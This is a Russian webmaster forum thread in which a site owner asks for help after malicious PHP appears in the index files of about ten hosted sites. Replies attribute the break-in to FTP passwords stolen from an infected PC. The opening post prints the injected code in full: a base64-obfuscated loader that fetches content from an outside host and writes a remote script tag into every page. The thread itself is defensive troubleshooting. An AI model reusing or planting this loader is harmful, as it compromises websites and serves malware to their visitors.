Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Сегодня столкнулся вот с такой проблемой.

[Удален]
1457

Сегодня столкнулся вот с такой проблемой.

На всех сайтах причём на разных ftp акаунтах,появились вирусы,а именно:

На всех сайтах прописан код в index(сах)


function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$file = @fopen ($get, "r");
		$content = @fread($file, 1000);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();

Итог в низу всех страничек появляется <script src="http://newdomme.changeip.name/rsize.js"></script>

Именно на всех сайтах на хостинге webhost1.ru,около 10ка сайтов с учётом 5 сайтов на одном ftp и 5 на другом акаунте.

Помогите что это? я понимаю что я могу удалить все вредоносные коды,и поменять акаунты к ftp,ну как и откуда? мб кто нибуть уже сталкивался?

Причём влез этот вирус в любой файл "index",которые даже не относились не к каким сайтам.

Откуда он влез? и как будущем защититься от него?

S
На сайте с 26.04.2013
Offline
59
sbklasiki
#1

Поймал похожую штуку к себе.

Удалил сам код и изменил права на папки и файлы, были сильно дырявые .htaccess

Так же скорее всего у вас DLE, и думаю у вас как и у меня был он не лицензионный. Купил лицензионный и больше проблем нету

[Удален]
#2
sbklasiki:
Поймал похожую штуку к себе.
Удалил сам код и изменил права на папки и файлы, были сильно дырявые .htaccess
Так же скорее всего у вас DLE, и думаю у вас как и у меня был он не лицензионный. Купил лицензионный и больше проблем нету

Да есть сайты на DLe,но оно ещё и затронуло все одностраничники,я по гуглили у людей например у не которых стояли wordpress разных версий и drupal,так что это быстрее всего не CMS виновата.

atranca
На сайте с 27.02.2011
Offline
126
atranca
#3

поидее перед этим локер должен появляться...

вирус в компе.

Удаляйте фелизу и меняйте пасс на ФТП.

Обычно эта хрень затрагивает все файлы index

установка прав на папки- не помогает.

Если посмотрите логи- залили по ФТП

123
[Удален]
#4
atranca:
поидее перед этим локер должен появляться...
вирус в компе.
Удаляйте фелизу и меняйте пасс на ФТП.
Обычно эта хрень затрагивает все файлы index

Ну вот ещё нагуглил интересную статью по этому http://dml.compkaluga.ru/forum/index.php?showtopic=72706

Кароч все сохранённые пароли FTP скомуниздило

atranca
На сайте с 27.02.2011
Offline
126
atranca
#5

ваш комп стал частью ботнета)

Iloveseo
На сайте с 11.10.2010
Offline
77
Iloveseo
#6

пк проверяй, сноси винду, меняй пароли.

Y
На сайте с 26.04.2012
Offline
77
Юрий
#7

я, если честно, очень плохо понимаю мотивацию людей, работающих с сайтами и сидящими на винде из-под админа.

работаешь с данными которыми может воспользоваться злоумышленник?

  • разграничь права доступов учеток и никогда, нет НИКОГДА не заходи под админом, только в безопасном режиме с отключением всей херни.
  • переходи на *nix- системы, тот же mac тоже является *nix-системой

то что касается безопасности твоего компа.

жестко разграничь права доступа на учетках, дабы при взломе одного сайта не пострадал весь аккаунт.

есть конечно вероятность, что хостера зарутили, но это маловероятно, если хостинг не от васи пупкина

Не беру и не ищу проекты.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий